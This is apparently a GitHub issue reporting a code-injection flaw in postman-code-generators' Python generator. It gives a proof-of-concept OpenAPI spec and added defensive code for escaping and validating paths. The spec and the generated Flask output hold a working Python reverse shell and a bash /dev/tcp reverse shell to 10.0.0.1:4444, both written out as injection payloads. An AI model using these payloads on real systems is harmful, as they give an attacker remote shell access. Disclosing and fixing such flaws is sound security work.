postman-code-generators
Python Code Generator does not encode payloads and could be used to inject malicious code
Describe the bug
Python code generator does not encode payloads and could be used to inject malicious payloads.
To Reproduce
If you create a definition as follows, you can see the Python code generation does not encode the path data that is sent.

```json
{
  "openapi": "3.0.2",
  "info": {
    "version": "1.0.0",
    "title": "Code",
    "description": "Code Proof of concept"
  },
  "paths": {
    "/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#": {
      "get": {
        "operationId": "CodeInjection",
        "responses": {
          "200": {
            "description": "Let's do this!",
            "content": {
              "application/json\"'; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 | echo \"": {}
            }
          }
        }
      }
    }
  }
}
```
This results in:

```python
from flask import Blueprint, request
from webargs.flaskparser import parser
from marshmallow import Schema, fields
from ..schemas import model
from .. import impl

bp = Blueprint('nothing', __name__)

@bp.route('/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#', methods=['get'])
def CodeInjection():
    return impl.CodeInjection()
```
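The root cause reported above is that the generator pastes the OpenAPI path straight into a Python string literal, so any quote or newline in the path ends the literal and the rest becomes source code. The following is an added example, not code from this issue or from any code-generator project: it models that rendering step with a constructed template, shows the same break-out with an inert constructed payload, and demonstrates two fixes a generator can apply (an allowlist on the path plus emitting the literal with `repr()`), together with an `ast`-based self-check the generator can run on its own output before writing it to disk. The template text, the `render_*` and `is_single_route` function names, the regex and the sample payload are all assumptions made for the example.

```python
"""Added example, not part of the original issue or of any generator project.
Models the bug: an OpenAPI path spliced into Python source with plain string
concatenation can close the quoted literal and append statements. Shows an
allowlist check, repr()-based escaping, and an ast self-check on the output.
Template text, function names and the sample payload are all constructed."""
import ast
import re
from keyword import iskeyword

# Constructed template, standing in for whatever the real generator uses.
TEMPLATE = (
    "@bp.route({path}, methods=['get'])\n"
    "def {op_id}():\n"
    "    return impl.{op_id}()\n"
)

# Inert constructed payload: closes the literal and the call, then starts a
# second function so the injected text parses as extra top-level code.
MALICIOUS_PATH = (
    "/x', methods=['get'])\n"
    "def injected():\n"
    "    return 'this should never be emitted'\n"
    "@bp.route('/y"
)

# Allowlist for URL path templates: segments, dots, dashes and {param} braces.
PATH_RE = re.compile(r"^/[A-Za-z0-9._~\-/{}]*$")


def render_unsafe(path: str, op_id: str) -> str:
    """Vulnerable rendering: the path is pasted verbatim inside single quotes."""
    return TEMPLATE.format(path="'" + path + "'", op_id=op_id)


def render_escaped(path: str, op_id: str) -> str:
    """Escaping alone: repr() builds a valid Python string literal, so quotes,
    backslashes and newlines are escaped rather than interpreted as syntax."""
    return TEMPLATE.format(path=repr(path), op_id=op_id)


def render_safe(path: str, op_id: str) -> str:
    """Hardened rendering: reject paths outside the allowlist, require a real
    identifier for operationId, then escape as in render_escaped."""
    if not PATH_RE.fullmatch(path):
        raise ValueError(f"path contains characters outside the allowlist: {path!r}")
    if not op_id.isidentifier() or iskeyword(op_id):
        raise ValueError(f"operationId is not a valid Python identifier: {op_id!r}")
    return render_escaped(path, op_id)


def is_single_route(source: str) -> bool:
    """Self-check a generator can run on its output: the module must parse to
    exactly one function with exactly one decorator, and that decorator's first
    argument must be a plain string constant (the route path)."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return False
    if len(tree.body) != 1 or not isinstance(tree.body[0], ast.FunctionDef):
        return False
    func = tree.body[0]
    if len(func.decorator_list) != 1 or not isinstance(func.decorator_list[0], ast.Call):
        return False
    args = func.decorator_list[0].args
    return len(args) == 1 and isinstance(args[0], ast.Constant) and isinstance(args[0].value, str)


def emitted_path(source: str) -> str:
    """Return the path string the generated decorator actually registers."""
    func = ast.parse(source).body[0]
    return func.decorator_list[0].args[0].value


if __name__ == "__main__":
    print(render_unsafe(MALICIOUS_PATH, "CodeInjection"))   # two functions emitted
    print(render_escaped(MALICIOUS_PATH, "CodeInjection"))  # one route, payload inert
    print(is_single_route(render_unsafe(MALICIOUS_PATH, "CodeInjection")))  # False
```

The allowlist is the cheap first line of defence and rejects the reported payload outright; `repr()` is the one that actually closes the injection class, since it holds even for characters an allowlist might legitimately admit. The `ast` check is independent of both and is the kind of regression test a generator's test suite can keep: every generated route module must parse to exactly one decorated function whose path argument is a string constant.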
Please assign this to me, I want to work on this issue. @akshaydeo @awillard1